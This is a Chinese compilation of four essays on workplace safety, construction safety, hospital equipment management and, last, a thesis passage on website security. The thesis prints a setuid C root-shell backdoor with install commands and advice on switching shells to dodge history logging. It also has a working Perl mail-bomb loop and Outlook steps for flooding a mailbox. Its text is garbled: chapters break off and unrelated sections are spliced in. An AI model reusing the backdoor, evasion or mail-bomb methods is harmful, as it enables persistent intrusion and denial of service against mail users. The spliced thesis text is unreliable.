第一篇:淺談安全行為科學與安全管理
淺談安全行為科學與安全管理
一般地說,企業生產過程中發生事故的原因可歸為內因與外因兩大類。內因是指勞動者的技術、心理活動等方面出現了與企業要求不相協調的情況:外因是指設備狀況、預防措施、防護用品以及勞動環境的條件不符合安全生產的要求。國內外大量事故統計表明,在企業內所發生的事故中,70%~75%是由于勞動者的操作行為發生錯誤或違章作業所引起的。而心理學研究告訴我們,人的行為是由人的心理狀態支配的。因此,安全管理人員在分析和研究事故發生的內因條件時,必須調查事故發生時人們的心理活動,亦即借助于心理學的理論和研究成果來指導安全管理工作。
行為科學是從社會學和心理學的角度研究行為的一門科學,它是研究人的行為規律,主要研究工作環境中個人和群體的行為。
安全行為科學是行為科學的重要應用分支,安全行為科學不但要應用行為科學研究的成果為其服務,同時安全行為科學為行為科學豐富了內容和擴大了內涵。因此,安全行為科學與行為科學是相互交*和兼容的關系,是行為科學在安全中應用而發展起來的應用性科學。人的安全行為是復雜和動態的,具有多樣性、計劃性、目的性、可塑性,并受安全意識水平的調節,受思維、情感、意志等心理活動的支配;同時受道德觀、人生觀和世界觀的影響:態度、意識、知識、認知決定人的安全行為水平。
影響人的安全行為的個性心理因素有以下幾個方面:
1.情緒對人的安全行為的影響。情緒為每個人所固有、受客觀事物影響的一種外在表現,這種表現是體驗又是反應,是沖動又是行為。
2.氣質對安全行為影響。氣質是人的個性的重要組成部分,它是一個人所具有典型的、穩定的心理特征。氣質使個人的安全行為表現為獨特的個人特色。人的氣質對人的安全行為有很大的影響,使每個人都有不同的特點和安全工作適宜性。
3.性格對人的安全行為的影響。人的性格是每個人所固有的、最主要的、最顯著的心理特征,是對某一事物穩定的和習慣化的表現方式。性格表現在人的活動目的上,也表現在達到目的行為方式上。
影響人的安全行為的社會心理因素
1.社會感知對人的安全行為影響。感知是眼前客觀刺激物的整體屬性在人頭腦中的反映,人的社會感知與客觀事物的本來面貌經常是不一致的,這就是使人產生錯誤的知覺或者偏見,使客觀事物的本來面目在自己的知覺中發生歪曲。
2.表現在價值觀對人的行為影響。領導和職工對安全價值的認識不同,會從其對安全的態度和行為上表現出來。
3.角色對人的行為影響。角色實現過程就是個人適應環境的過程在安全管理中,需要利用人的這種角色為其服務。
其中社會感知對人的安全行為影響最大,長時間影響可使人產生一種潛意識(或下意識)的安全行為。
影響安全行為的主要社會因素
1.社會輿論對安全行為的影響。包括社會輿論的監督和社會輿論的宣傳。基于這個原因通過各種形式在施工現場進行安全宣傳活動及目前社會輿論對安全生產監督是很有必要的。如“萬里行”和“安全月”等安全宣傳活動及各種安全事故調查和處理的報道。
2.風俗與時尚對個人安全行為影響。風俗與時尚對安全行為的影響既有利的一面,也有不利的一面,我們可以通過企業安全文化的建設實現揚其長,避其短。
環境狀況對人的安全行為的影響
人的安全行為除內因影響外,還有外因(環境)的影響。環境變化會刺激人的心理,影響
人的情緒,甚至打亂人的正常行動,物的運行失常及布置不當會影響人的識別與操作,造成混亂和差錯,打亂人的正常活動。
企業安全價值觀規律處于中心支配地位,而物的規律和職工心理運動規律是安全價值觀規律的基礎,左右著安全價值觀規律的運動方式。物的規律影響著職工心理運動方式和安全價值觀,職工心理運動規律同樣也影響著物的規律和企業安全價值觀規律。從實際情況分析,職工心理規律可能是決定安全生產的最基礎最直接的因素。這是因為:隨著改革的逐步深入,企業管理方式正在或已經發生了深刻變化。
目前很多國外企業的安全研究出現的一個新現象是越來越重視對職工個人思想和行為特征對安全生產影響的研究,比如酗酒和濫用藥物對安全的影響、比如工作壓力和職工的精神耗竭問題的研究、比如顯示屏對人體進而對職工身心健康的影響等等。
影響安全行為的心理因素實證分析
職工心理呈現復雜多元性,但并非毫無規律性。安全心理學中有一個著名的事故傾向理論假說。它認為,事故總是由少數幾個人造成的,即50%的事故是由10%的人造成的。
1)小部分工人(如20%)造成了大部分(70%)事故。國外的另一項研究結果認為,事故年齡為17-28歲之間的人群中最頻繁,50-60歲的人群中達到最低。
2)工種越特殊、工藝越復雜,對人的心理素質要求越高。國外的研究認為,工人的知覺技能等于或高于運動技能,工人就相對安全;但是當知覺水平低于運動水平,雇員就有事故傾向,并且二者差異越大,事故傾向越大,通俗地說,反應速度快于知覺速度的工人更可能發生事故。
3)絕大多數事故發生在工作的中后期,而此階段恰恰是職工心理呈現“云團狀”。眾所周知,企業管理理論已經從18世紀的“經濟人”、20世紀30年代的“社會人”、60年代的“自我實現人”發展到今天的“復雜人”(60年代由美國心理學家E?H?沙因提出)。復雜人理論認為,人的需要的動機模式是多種多樣的,因此管理需要“常變”。這個重要管理思想對安全管理的啟發就是,企業制定安全政策、進行安全管理要建立在“復雜人”的基礎之上,把“人”想得復雜些,而不能把“人”當成是執行政策的機器。怎樣把“人”想得復雜些呢?有以下幾個方面
(一)注意力問題:注意(at-tention),是指心理活動對定對象的有選擇的集中。注意具有選擇的功能,這就是使心理活動指向于那些有意義的、符合需要的、與當前活動相一致的各種刺激,而避開或抑制那些無意義的、附加的、干擾當前活動的各種刺激,也就是使心理活動具有一定的方向性;注意具有保持功能,即當外界大量信息進入感知記憶以后,每個信息單元必須經過注意才能轉換成一種更持久的形式而得到保持;注意具有對活動進行調節和監督的功能。因此研究人的注意問題對實踐、對安全生產關系極大。
安全管理者的責任在研究職工注意力問題時,須把握好職工的注意分配和注意廣度。研究表明,注意分配取決于同時并進的幾種活動的性質、復雜程度以及對活動的熟悉或熟練程度。也就是說在安排工作時要盡可能避免同時做二種及以上不同性質的活動,活動的難易程度要配合得當,要加強職工的技能訓練以提高職工現場的注意力;在注意廣度方面,相關的研究表明注意的對象越集中,排列得越有規律,越能成為相互聯系的整體,從而職工在同一時間內能夠清楚地覺察或認識客體的數量就越多。注意的廣度也隨著活動的任務和個人的知識經驗不同有所不同,因此,提高活動的意義性、趣味性,也是提高注意廣度的有效辦法。
(二)疲勞問題:疲勞是指因持續工作造成體力及工作效率下降并伴隨著疲憊感的生理現象。它具有“一過性”特點,即經過休息一般都可恢復過來。疲勞分生理疲勞和心理疲勞兩種。生理疲勞又稱肌肉疲勞或體力疲勞。這在現代化大型企業中,更多的是心理疲勞,即主觀疲勞或精神疲勞。
疲勞隨工作時間延長而增強。在開始階段,人的工作能力逐步釋放出來,隨即達到最佳狀態,經過一段時間,由于持續工作,疲勞不斷積累,人的工作能力開始下降,出現疲勞現象。值得注意的是如果造成過度疲勞后,即使按作息時間休息,也不能使工作能力得到充分恢復。
(三)情緒的問題:情緒是意識中最重要的構成因素,對人格的整合提供動機。一方面,情緒對人的認知的發展和認知活動起著監督作用。在情緒一一認知運動的相互作用中,情緒是認知發展的契機,它激發人去認知、去行動,例如,興趣激起研究行為,決定認知的選擇性和方向:而痛苦、憤怒或緊張的情緒則使認知活動變得刻板和狹窄+限制知覺和思維,并干擾利用線索和采取變式。另一方面,情緒對人格的整合提供動機。因此,安全管理者掌握好情緒理論,把握好職工情緒特點,調節好職工情緒對于職工很好地認知企業安全價值觀、保證安全生產有著十分重要的現實意義。
第二篇:安全行為科學在建筑工程中應用
安全管理科學在建筑工程中應用
姓名:陳松 學號:05109230 專業:土木工程(民用)
摘 要:安全問題是工程建設的一個重大問題,需要在建筑工程中引入安全管理科學的指導,依據建筑工程安全問題和安全事故問題,提出了加強當前建筑工程中安全管理科學在建筑工程中的幾點建議,目的是為了進一步預防和有效管理建筑工程項目,完善建筑工程中的安全管理措施。
關鍵詞:建筑工程;安全管理;科學管理
建筑業的生產活動危險性大,不安全因素多,是事故多發行業。近幾年我國建筑業的死亡率是所有工業部門中僅次于采礦業的最高的行業,損失巨大,令人痛心。現在需要應用科學的現代企業安全管理模式,不斷提高安全管理水平,真正把安全管理工作做好。因此,做為建筑企業,應認真研究建筑業安全管理的現狀,樹立新的安全管理的理念。
一、建筑業項目安全管理的現狀
(一)建筑業的安全事故絕大部分發生在施工現場,可以說,施工項目是事 故發生的發源地。
因此,我們必須對我們的項目安全管理模式是否滿足安全管理科學的需要、是否符合項目管理的特點、是否滿足國家和行業法律、法規的要求進行認真分析,從而,達到改進或更新項目安全管理模式的目的。
(二)安全事故的原因分析
1.人的不安全管理,是事故的直接原因。
所謂人的原因,是指由于人的不安全管理導致在生產過程中發生的各類事故。人在生產活動中,具體不安全管理有:操作錯誤(啟動操作不給信號、忘記關設備)、奔跑作業、送料過快、以不安全的速度作業;使用不安全設備;用手代替工具操作;物體的擺放不安全;冒險進入危險場所;在起吊物下停留作業;機器運轉時加油、清潔、修理;有分散注意力的行為;未使用防護用品;不安全著裝;工作時說笑打鬧、帶電作業等。
2.物(設備)的不安全狀態,也是事故的直接原因。
對建筑行業來說,“物”包括施工過程中所涉及的設備、材料、半成品、燃料、施工機械、機具、設施等。不安全的情況有:施工電梯的限位失靈,造成冒頂;塔吊的鋼絲繩脫絲;未及時更換,造成鋼絲繩斷裂,掉物墜落;電鋸等用電設備電線老化,造成電線失火等。
I
3.不良的生產環境對人的行為和物的狀態產生負面影響。
事故的發生都是由于人的不安全管理和物的不安全狀態直接引起的。但不考慮客觀的情況而一概指責施工人員的“粗心大意”、“疏忽”也是片面的,有時甚至是錯誤的。還應當進一步研究造成人的過失的背景條件,即不安全環境,如照明光線過暗或過強導致作業現場視物不清;作業場所狹窄、雜亂;地面有油或其他影響環境的東西等。與建筑行業緊密相關的環境,就是施工現場。整潔、有序、精心布置的施工現場,事故發生率較之雜亂的現場肯定低。到處是施工材料、機具亂擺放,生產及生活用電私拉亂扯,不但給正常生產、生活帶來不便,而且會引起人的煩躁情緒,從而增加事故隱患。當然,人文環境也是不能忽略的。如果某企業從領導到職工,人人講安全,重視安全,逐漸形成安全氛圍,更深層次地講,就是形成了企業安全文化,那么這個企業的安全狀況肯定良好。
4.管理的欠缺是事故發生的重要因素,有時甚至是直接的因素。
人的不安全管理和物的不安全狀態是事故發生的直接原因,都與管理有直接的關系,因此,管理不善是造成安全事故的間接原因。人的不安全管理可以通過安全教育、安全生產責任制以及安全獎懲機制等措施減少甚至杜絕。物的不安全狀態可以通過提高安全生產的科技含量、建立完善的設備保養制度、推行文明施工和安全達標等活動予以控制。對作業現場加強安全檢查,就可以發現并制止人的不安全管理和物的不安全狀態,從而避免事故的發生。常見的管理缺陷有制度不健全、責任不分明、有法不依、違章指揮、安全教育不夠、處罰不嚴、安全技術措施不全面、安全檢查不夠等。
由此看來,安全管理的目的就是保證良好的施工環境,保證人和物的安全狀態,這些都需要通過建立科學、合理的安全管理模式,并通過安全管理模式的正常運行來達到目的。
二、建筑安全的管理措施
(一)改變安全管理科學教育的現狀,實行分級負責、分級教育。
各類人員必須具備相應執業資格才能上崗。所有新員工或從事新的工作必須經過三級安全教育,即公司、項目部、班組的安全教育,并要定期培訓,不斷學習新工藝、新技術,強化工程特點所帶來的安全風險和具體作業安全要求。
(二)加大科技投入,做好科研合作。
鼓勵施工企業加大安全生產的科技投入,加強與科研單位和高等院校合作,研究、開發、推廣一批安全適用、先進可靠的生產工藝、技術措施和裝備,淘汰落后工藝,通過科技進步提高企業的安全生產保證能力和安全生產水平,要充分利用中介機構和社會力量做好工程質量安全監督工作,充分發揮中介機構和社會監督的制約作用,從而把質量安全的監管工作全面引向深入。
II
(三)加強風險評估,做好重點管理。
建筑施工企業應針對不同的項目特點和不同的施工階段分析安全風險,作出評估,并對每個項目具體化,做好安全防護和重點管理。
(四)編制安全措施,執行科學程序。
按照建筑施工安全法規標準的要求,結合工程的特點編制安全技術措施,遇有特殊作業(深基坑、起重吊裝、模板支撐、人工挖孔樁、臨時用電等)還要編制單項安全施工組織設計方案,并按程序經審核批準后才能進行。
(五)搞好“五定”,認真落實。
對查出的安全隱患要做到“五定”,即定整改責任人,定整改措施,定整改完成時間,定整改完成人,定整改驗收人。
三、項目安全管理模式
(一)全員安全管理科學管理模式
1.注重培育全員安全管理科學的文化
這種全員安全管理科學管理模式是“全員、全方位、全過程、全天候”的管理,因此,其安全文化應該是全員安全文化。形成新的安全文化就是要培育全員安全文化。全員管理不僅包括總承包管理人員、分包管理人員和全體工人,還應包括業主、設計、監理及社會相關方。
作為總承包方,要積極調動和發揮相關各方安全管理的監督作用,使安全管理成為壓倒一切的工作。當然,首先要充分調動本單位全員安全管理的積極性,形成全員安全文化。只有形成全員安全文化,才能營造安全生產的氛圍,保障人員安全。全員安全文化是新的項目安全模式的核心。
2.全員安全管理科學管理模式的四個轉變
全員安全管理科學管理模式與傳統的項目安全模式相比,有四個轉變,分別是:變單純的安全專業人員的崗位安全管理為全員參加的體系安全管理;變單純的安全管理為安全管理與進度、工序穿插和施工方法緊密結合的綜合管理;變以點為主的間斷的、靜止的管理為線面結合的、連續的、動態的管理;變并行的安全與生產兩條線為安全與生產緊密結合的安全生產一條線。
3.全員參與是全員安全管理模式的核心
全員安全管理模式下,項目安全管理組織已經不再是單獨的崗位安全管理組織,而是以項目經理為首的,以專職的崗位安全管理為核心,以各專業工程師為 III
骨干,班組長及工人全員參與的,安全監督管理層和安全管理實施層既獨立設置又互相依托和緊密聯系的體系安全管理,是將生產與安全的緊密結合的組織,是對項目安全管理資源的充分挖掘和充分利用。
(二)安全目標管理模式
隨著安全管理工作的不斷進步,安全管理由定性逐漸走向定量,先進管理經驗和方法得以迅速推廣。目標管理應用于安全管理方面,稱之為安全目標管理。它是生產企業確定在一定時期內應該達到的安全總目標,分解展開、落實措施、嚴格考核,通過組織內部自我控制達到安全目的的一種安全管理方法。它以總的安全管理目標為基礎,逐級向下分解,使各級安全目標明確、具體,各方面關系協調、一致,把全體成員都科學地組織在目標體系之內,使每個人都明確自己在目標體系中所占的地位和作用,通過每個人的積極努力來實現特定組織的安全目標。
制定安全目標要具體,根據實際情況可以設置若干個,例如事故發生率指標,傷害嚴重指標,事故損失指標或安全技術措施項目完成率等。但是,目標不宜太多,以免力量過于分散,應將重點工作首先列入目標,并將各項目標按其重要性分成等級或序列。各項目標應能數量化,以便考核和衡量。
參 考 文 獻
[1]王建華,孫啟燕.試論建筑工程與安全工程[J].人民黃河,2004,26(10):33-36.[2]浪底工程咨詢公司.關于施工安全工作的實施意見[R].鄭州:建筑委員 會,2001.[3]山西省萬家寨引黃工程公司.山西省萬家寨引黃工程施工期規定[R].1999.IV
第三篇:質量與安全管理
烏蘭浩特市人民醫院
器械科醫療設備質量與安全管理小組
一、醫療設備質量與安全管理小組成員
組
長: 陳鵬義
成員: 于洋
邢有
張國晉
設備使用監管:于洋
放射機房監測:邢有 特殊裝備監測:于洋
烏蘭浩特市人民醫院
醫療設備質量與安全管理小組職責
1、組長負責落實“醫療裝備質量與安全管理”內容要求,建立醫療裝備質量管理小組及制度,體現對全院的設備質量全面管理。
2、醫療裝備質量與安全管理小組至少每半年召開會議一次,遇特殊情況隨時召開,討論總結全院的醫療設備運行情況,對存有缺陷的科室發《醫療裝備質量持續改進反饋表》,并針對所發現的制度和流程上存在的問題,提出改進措施,并在下一次會議中對改進措施的效果進行評價,以做到醫療裝備質量的持續改進。
3、嚴格做好設備使用情況監管、放射機房監測等工作,認真聽取使用科室對醫療設備使用管理方面的意見及建議
4、對各科室服務過程中不足的地方應及時改進。
5、制定全員培訓計劃,做到知識不斷更新,積極引進新技術新業務。
烏蘭浩特市人民醫院
醫療裝備質量與安全管理制度
1.重點抓好醫療裝備核心制度的落實:醫療裝備的管理、使用、維修、裝備意外應急管理等制度。
2.加強醫療裝備質量關鍵環節的管理。
3.加強全員質量和安全教育,牢固樹立質量和安全意識,提高全員質量管理與改進的意識和參與能力,嚴格執行《醫療設備安全管理制度與規范》。
4.設備使用監管組每月隨機下科檢查一次,機房監測與特殊設備監測組每季度下科檢查一次。
5.加強全員培訓,全員“基礎理論、基本知識、基本技能”必須人人達標。
6、按照中華人民共和國《放射性同位素與射線裝置放射防護條例》有關規定,實行許可登記制度,醫院內有放射性同位素與射線裝置的科室必須向醫院上級主管部門申請許可證。甲、乙類大型醫用設備必須辦理大型醫療設備配置許可證。
7、醫院所有醫療設備必須由廠家專業技術人員進行安裝、調試或計量,驗收合格后方可投入使用。
8、醫療設備的操作人員應由廠家進行專業培訓后方可上機操作,大型醫療設備的操作人員須持上崗證,并嚴格按照每臺醫療設備操作規程執行。
第四篇:畢業論文安全與管理
題 目:網站安全與管理
摘要
本文側重在網站安全方面來談,討論了網站常用的保護方法,詳細地分析比較了專用網站保護軟件采用的各種技術實現和優缺點,并指出了其缺陷。安全雖不是使用某個工具或某些工具就可以解決的,但使用這些工具能幫助提高安全性,減少安全風險。只有更好的保障網站的安全,才能便于網站的管理。
關鍵詞: 安全配置、防火墻、網站安全
目錄
第一章
查出黑客所在
首先,就要查出黑客所在才能更好的防御。查出黑客所在有兩種方法:
1.用w指令查看系統信息
$w
9:01pm up 10:08, 1 user, load average: 0.08, 0.06, 0.05 User tty login@ idle JCPU PCPU what
notes console 10:54am 9days 28:04 23:29 /usr/dt/bin/dtscreen-mode blank
notes pts/2 10:54am 10:07 /sbin/sh notes pts/4 10:54am 10:06 /sbin/sh notes pts/5 10:56am 9:59 /sbin/sh
在w顯示信息的最開頭是發出w命令的時間、系統啟動后的時間、及注冊在系統的用戶數。最后的三個數表示平均負載,即使用系統資源的程度,使用w命令給系統增加了0.08負載。其他兩個數字分別表示在最后5分鐘及十五分鐘內系統的平均負載量。
注意:當有人在猜password時,將會大大增加系統的平均負載。
2.進程記帳
Unix 系統可以通過設置選項來讓核心在每個進程結束時產生一個記錄。這些記錄所產生的報告被稱為進程記帳。它包括進程使用資源的信息,以及所執行的命令名。如果運行 的是調整用戶id程序,則還包括用戶名等。系統管理員可根據進程記帳的CPU時間讓用戶交納上機費,也可用進程記帳來觀察某一用戶執行了哪些命令。進程記帳和審計是兩碼事,審計是監視對安全性敏感的事件。進程記帳并不記下所執行 命令的參數,所以無法知道某一命令修改了哪個文件,甚至也不知道此命令的執行是否成 功。但系統管理員仍然可以在進程記帳中找出某些線索。基于System V的系統和基于BSD的系統在進程記帳方面所采納的方法不同,命令也不 一樣。
2.1 System V記帳
在System V 中,進程記帳保存在/usr/adm/pactt文件中。root可運行/usr/lib/acct/startup 來啟動進程記帳。記帳信息的日常處理可用runacct命令來做,它會壓縮pacct文件。每月 的處理由shell程序monacct來完成。這兩個程序都在/usr/lib/acct目錄下。acctcom 命令可用來搜索pacct中的內容,并產生報告。例如:查找用戶“tommy”在 10:00 至11:30這段時間內所執行的全部命令。$acctcom-u tommy-s 10:00-e 11:30 START BEF: Sat Oct 10 11:30:00 1998 END AFTER: Sat Oct 10 10:00:00 1998 COMMAND START END REAL CPU MEAN
NAME USER TTYNAME TIME TIME(SECS)(SECS)SIZE(K)cat tommy pts/3 11:01:13 11:01:13 0.02 0.02 492.00 mail tommy pts/3 11:01:13 11:01:13 0.02 0.02 876.00 clear tommy pts/3 11:01:14 11:01:14 0.03 0.01 744.00 ls tommy pts/3 11:01:16 11:01:16 0.03 0.03 776.00 date tommy pts/3 11:01:23 11:01:23 0.01 0.01 664.00
acctcom命令用來告訴系統管理員某一用戶干了些什么,而不是正在干什么,而且它指 列出了命令名,沒有參數。所以,從中發現一些線索,如可找出使用大量cpu時間的進程(典型的是猜口令進程)。
可用shell程序runacct來產生幾個報告。這些報告存放在/usr/adm/acct/sum目錄下,其文件名格式為rprtMMDD。報告的第一部分包含“變更”信息,如進程記帳啟動及關閉的 時間(關閉記帳可能是由于某人想隱藏某些活動),以及系統時間的改變。第二部分是每個 用戶注冊到系統的時間以及有關每個端口的報告,還包括了每個端口上“接通”和“斷開” 的次數。“接通”表示一次成功的注冊,“斷開”表示退出系統或注冊失敗。
大量的“斷開” 可能意味著有人在試驗“注冊名,口令”序列組試圖侵入系統中。報告的最后一部分是有關用戶最后一次注冊的信息,這個最后注冊報告是隨著用戶的 不斷注冊、退出而時刻更新的。報告中還包括用戶名及最后的注冊時間,越早退出系統 的帳號排在越前。這個報告對于發現那些死帳號非常有用,管理員可能會在這里發現一 些奇怪的事情如有人注冊到系統管理的帳號中(如bin或sys)。
2.2 BSD系統的記帳
BSD系統的進程記帳用/usr/etc/accton程序啟動。默認的記帳文件為/usr/adm/acct 只要啟動了進程記帳,該文件會增長得很快。BSD有兩條命令來處理記帳信息。第一條是 /usr/etc/ac,處理在usr/adm/wtmp文件中的注冊信息,第二條是 /usr/etc/sa,產生已用 命令的小結報告,保存在/usr/adm/savacct文件中。
BSD系統中也有與acctcom類似的命令叫做lastcomm。lastcomm命令反向搜索/usr/adm/acct 文件,產生出與acctcom命令相似的結果。
BSD記帳系統也和System V一樣,有類似的缺陷(從安全性角度講),即不保留命令的參數。并且,BSD系統沒有最后注冊的報告。
現在針對前面的兩點防衛措施,從攻的角度來看:
1.對與第一點中用w、who、last、ps等命令,hacker完全可以用程序將自己的記錄隱藏 起來,使管理員用以上幾個命令都查看不到。當然此時hacker已經把root的權限得到 手(如何得到,下章討論)。
2.就算最笨的hacker,當他無法隱藏自己時,他也會把整個記錄文件刪除掉,免得管理員 查到用什么帳號從哪里登錄進來,運行了些什么指令。但顯而易見,雖然管理員此時(沒安裝第三方的審記軟件時)不能知道誰人在哪里發起攻擊,但也無疑地告訴管理員 “你的系統已經給攻破了”。
3.歷史文件記錄
ksh、csh、sh、bash、zsh都可保存歷史文件。其文件如下: sh:.sh_history(sh 也即Bourne shell)csh:.history ksh:.sh_history bash:.bash_history zsh:.history
在運行sh和ksh的用戶的相應.profile中,加入HISTORY=100,可指定.sh_history
文件保存該用戶最近運行的100條記錄。對于csh,則在.cshrc文件中加入, set history=100,則可。用戶可以運行history指令來查看歷史文件中的內容。對于Ksh、sh 也可運行 tail-f.sh_history 來查看,其順序是從最近的運行的指令開始。而C shell 是在退出才能更新文件,所以不能用tail來觀察Cshell執行了那些命令。這些歷史文件比進程記帳更為有用,因為命令的參數也被保留下來,所以可通過執行 執行命令的上下文聯系察覺到用戶干了些什么。但話又說回來,其實這只起到一定作用而 已。BTW:.profile用于Bourne和Korn shell;.login和.cshrc用于C shell。
4.找出屬主為root且帶s位的程序:
以root身份執行以下的指令, 找出此類文件,看看是否有可疑的程序存在。
#find /-perm-4000-exec /bin/ls-lab {} “;”
其實在以前post的文章 1284 “系統安全技術的研究” 已有討論過如何得到root shell 當hacker進入系統后,大部份是利用buffer overflow取得root shell 例如:solaris 中帶s位的fdformat,ufsdump,ping等;AIX中xlock;SGI中的xlock;digital中的dop;等等,都給hacker找出其漏洞。當hacker利用這些big bugs取的root shell后,若其想以后還想入侵此系統的話,當然是留下root shell的程序,此時hakcer也不關心原來的bugs是否給fix掉,他/她 不再需要利用bug了,只須運行自己留下的root shell即給。以下給出得到root shell的簡單程序:
#cat getrootshell.c void main(void){
setuid(0,0);
execl(“/bin/sh”, “sh”,0);}
編譯后得到bin文件。此外,接著寫入: #cc-o getrootshell getrootshell.c #chmod 4777 getrootshell #chown root:other getrootshell #ls-al getrootshell
-rwsrwxrwx 1 root other 5 Oct 12 06:14 getrootshell(注意全過程是在取的rootshell后,才可這樣做)
這樣hacker就在該系統中留下了后門,下次入來后就不需利用還沒fix的 fdformat,xlock,dop等bug 的程序了,直接運行getrootshell程序,就可跳成root了。因此,管理員要查清此類型的文件。
現在從攻的角度來看上面兩點防衛措施:
1..對于history文件,當hacker進入系統后可以改變shell類型,來使保存他后來所有指 令的history文件失效。因此,當hacker用crack到的帳號進入系統后,第一條所敲的指令 是改變shell類型的指令.example in digital unix下: c:>telnet XXX.XXX.XXX.XXX Digital UNIX(center)(ttyp5)login: tommy Password:
Last login: Sun Oct 11 22:43:51 from HPVC.com
Digital UNIX V4.0A(Rev.464);Sat Feb 7 19:54:12 GMT+0800 1998
The installation software has successfully installed your system.There are logfiles that contain a record of your installation.These are:
/var/adm/smlogs/install.cdfgeneral log file
/var/adm/smlogs/install.FS.loglog for the setld(8)utility /var/adm/smlogs/fverify.log-verification log file center>chsh Old shell: /bin/sh New shell: ksh
其他系統不在此一一列舉。
2.對于類似getrootshell的bin文件,hacker也不會真的那么愚蠢到起這個名字,且他們 會將此類型的程序藏在不易察覺的目錄下,如果不是老練的管理員是不會發現的。(注:一般來說,hacker不會把getrootshell文件刪除的,因為他也不能肯定下次進入系統時那些bugs還是否可以利用,使其變root)
第二章
網站的通用保護方法
針對黑客威脅,網絡安全管理員采取各種手段增強服務器的安全,確保文檔中的屬性符號,不進行屏蔽會對論壇造成嚴重的后果,網絡上不是有很多“小兒科”的聊天室踢人術嗎?簡單的方式是不允許小于號和大于號的出現,因為所有HTML語法必須包含在這兩個字符間,如果程序檢測到它們就返回一個錯誤提示,下面一行Perl代碼快速地清除了這兩個字符: $user_input=~s/<>//g;當然,還有比較好的選擇,就是將這兩個字符轉換成它們的 HTML換碼(特殊的代碼),用于表示每個字符而不使用該字符本身。下面的代碼通過全部用<替換了小于符號,用>替換了大于符號,從而完成了轉換過程: $user_input=~s//& gt;/g;
三、編寫簡單的郵件炸彈:
利用Perl程序可以非常快速的編寫郵件炸彈程序,這種方法比起直接使用別人編寫的郵件炸彈要好的多,至少能夠真正“體會一下”什么才是黑客。這個炸彈的編譯環境是具備一臺有CGI權限的網絡服務器,同時這臺服務器上提供了sendmail命令(當然這一切可以在自己的系統上進行設置),并且還要初步了解有關perl語言的知識。
程序的原理非常簡單,就是利用sendmail命令向目標重復發送相同內容的電子郵件,為了控制發送郵件的數量,我們聲明一個計數器變量,同時將程序用while()函數做循環,下面是程序的源代碼:
#!/bin/perl $file='/user/lib/sendmail';$target='someone@target.com';$count=0;while($count<1000){ open(MAIL,“/$file$target”)|| die“ Can not open $file!n print MAIL”哈哈,你被攻擊啦“ close(MAIL);sleep 3;$count++;}
程序就上面這些。Perl屬于解釋型語言,因而不需要進行編譯,直接將源代碼上傳到服務器上,然后設置成為755或者775型,就可以通過瀏覽器調用而直接使用了。程序中的$file和$target變量分別定義了sendmail命令的路徑和目標的地址,在使用此程序以前要根據個人需要進行修改,而$count變量是我們要發送的炸彈郵件數量,因為發送郵件工作是服務器完成的,因而速度非常快,這個數量可以設置的大一些,我們并不會感覺到程序的緩慢。
四、使用Outlook制作電子郵件炸彈:
相對上一種方法,這個方法更加直接,它不需要專用工具而只需要利用Outlook電子郵件客戶端軟件就可以輕松完成。首先介紹一下郵件炸彈的基本原理:電子郵件炸彈一般來說分成兩種。一種是通過發送巨大的垃圾郵件使對方電子郵件服務器空間溢出,從而造成無法接受電子郵件;另一種方法是無休止的發送相同內容的但很小的郵件使對方接收不過來而放棄自己的電子郵箱。因此我們只要實現其中的一種即可稱之為“郵件炸彈”。使用Outlook制作電子郵件炸彈就是利用了上面說的第二種方法,不斷的向指定目標發送電子郵件,首先我們要做一些準備工作:申請一個免費的電子信箱,并把這個信箱賬號設置到Outlook中,然后選擇Outlook工具菜單的“工具”-〉“賬號”,選擇其中剛剛申請的那個電子郵件賬號,然后點擊窗口右面的“屬性”按鈕。在出現的屬性窗口中繼續點擊窗口上面的“高級”標簽,更改“發送”設置中的“郵件拆分大小”屬性值,這個值盡量更改的小一些(推薦更改成16),確認退出。
這樣以后只要使用這個經過設置的電子信箱發電子郵件,只要郵件的大小超過了規定的字節數,Outlook就會自動將電子郵件進行分割,例如一封1600KB的信件,將它拆分成16KB一封的電子郵件發送給對方,對方的信箱中就會出現100多封電子郵件,郵件炸彈的功能就實現了!
五、如何防止電子郵件炸彈:
電子郵件的防范可以從多個方面著手,例如未雨綢繆從開始就謹慎的使用電子信箱,或者也可以亡羊補牢盡快修復電子信箱。在網絡上,大多數關于防范郵件炸彈的文章都說的是Linux等系統,而真正涉及初級用戶的并不是很多,然是實際更多的人使用的還是Windows系統,即便pop3服務器是Linux系統,現在也沒有更多的人通過傳統的命令方式接收郵件了,這里將講述一個與讀者聯系緊密的防止電子郵件炸彈的方法。
1、不公開信箱地址、準備多個信箱:
早作準備,不讓黑客知道自己的電子信箱地址是最好的方法,這就需要使用者在網絡上盡量少的公開自己的信箱地址,不要輕易將地址留給不認識的人或者留在電子論壇上。當然,如果可以,使用者可以多申請幾個電子信箱,不同的信箱聯絡不同的人,專門預備出一個公開的電子信箱,一旦受到攻擊也不會造成過多的損失。
2、使用軟件快速清理炸彈郵件:
使用BombCleaner等炸彈清理軟件,可以在不接受信件的時候察看郵件清單,從中選擇垃圾信件進行遠程刪除,這樣做可以節省大量下載信件的時間,同時也堵住了通過電子郵件傳播的病毒。但是這種方法有它最明顯的缺陷:一旦信箱已經被郵件塞滿了,就來不及刪除上面的信件、而且信發送過來的重要信件也無法接收了。
3、設置信箱過濾:
信箱過濾可以很好的解決上面軟件解決不了的問題。過濾器可以設置在本地的電子郵件客戶端程序上,也可以直接通過瀏覽器在pop3信箱的內部進行設置,前者和上面介紹的利用軟件基本類似,也是在接收電子郵件的時候對郵件是否屬于垃圾或炸彈進行判斷,所以在信箱被塞滿的時候也不見的起到什么效果。
但是,如果能夠在pop3服務器上設置自己信箱的過濾,就可以從根本上避免被攻擊的可能了。具體做法是這樣的,通過瀏覽器登陸到pop3服務器上,然后進入自己的信箱,之后找到“郵件收發設置”,并且在其中的過濾器內填寫有關發送垃圾郵件的郵件地址(多 個地址可以用分號隔開),并且確認保存,這樣就能夠在服務器上過濾掉炸彈郵件、保障自己的電子信箱安全了。
4、設置接收郵件的大小:
如果黑客發送過來的不是成百上千封“小信件”,而是一封上百兆的炸彈怎么辦呢?這種郵件不需要多少,一封過來就可以把電子信箱塞的滿滿的,所以用戶在設置“過濾”的時候,還要注意“接收信件大小”選項,最好將這個數值控制在電子信箱的三分之一左右。例如使用者的電子信箱空間是三十兆,那么可以通過設置規定接收信件的大小不得超過十兆每一封,如果超過了這個數值,那么來信將被確認為郵件炸彈,而直接被系統舍棄,這樣郵件炸彈便再無施展自己的空間了。
第五章
網站保護的缺陷
目前中國國內
